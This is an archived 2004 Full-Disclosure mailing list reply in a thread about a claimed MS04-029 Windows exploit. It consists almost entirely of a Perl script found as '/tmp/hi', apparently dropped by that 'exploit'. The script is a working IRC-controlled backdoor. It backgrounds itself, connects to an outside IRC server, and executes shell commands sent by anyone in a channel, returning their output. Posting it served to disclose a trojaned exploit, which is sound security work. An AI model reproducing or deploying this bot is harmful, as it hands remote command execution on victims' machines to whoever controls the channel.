[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

RE: [Full-Disclosure] New REmote Windows Exploit (MS04-029)

To: full-disclosure@xxxxxxxxxxxxxxxx
Subject: RE: [Full-Disclosure] New REmote Windows Exploit (MS04-029)
From: Rich Parsons <richwoodridge@xxxxxxxxxxxx>
Date: Thu, 4 Nov 2004 08:45:25 +1100 (EST)

Interesting /tmp/hi file.

#!/usr/bin/perl
$chan="#0x";$nick="k";$server="ir3ip.net";$SIG{TERM}={};exit
if fork;use IO::Socket;$sock =
IO::Socket::INET->new($server.":6667")||exit;print
$sock "USER k +i k :kv1\nNICK
k\n";$i=1;while(<$sock>=~/^[^ ]+ ([^ ]+)
/){$mode=$1;last if
$mode=="001";if($mode=="433"){$i++;$nick=~s/\d*$/$i/;print
$sock "NICK $nick\n";}}print $sock "JOIN
$chan\nPRIVMSG $chan :Hi\n";while(<$sock>){if (/^PING
(.*)$/){print $sock "PONG $1\nJOIN $chan\n";}if(s/^[^
]+ PRIVMSG $chan :$nick[^ :\w]*:[^ :\w]*
(.*)$/$1/){s/\s*$//;$_=`$_`;foreach(split "\n"){print
$sock "PRIVMSG $chan :$_\n";sleep 1;}}}


Find local movie times and trailers on Yahoo! Movies.
http://au.movies.yahoo.com

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Follow-Ups:
- RE: [Full-Disclosure] New REmote Windows Exploit (MS04-029)
  - From: raza

Prev by Date: Re: [Full-Disclosure] New Remote Windows Exploit (MS04-029)
Next by Date: Re: [Full-Disclosure] New Remote Windows Exploit (MS04-029)
Previous by thread: Re: [Full-Disclosure] New Remote Windows Exploit (MS04-029)
Next by thread: RE: [Full-Disclosure] New REmote Windows Exploit (MS04-029)
Index(es):
- Date
- Thread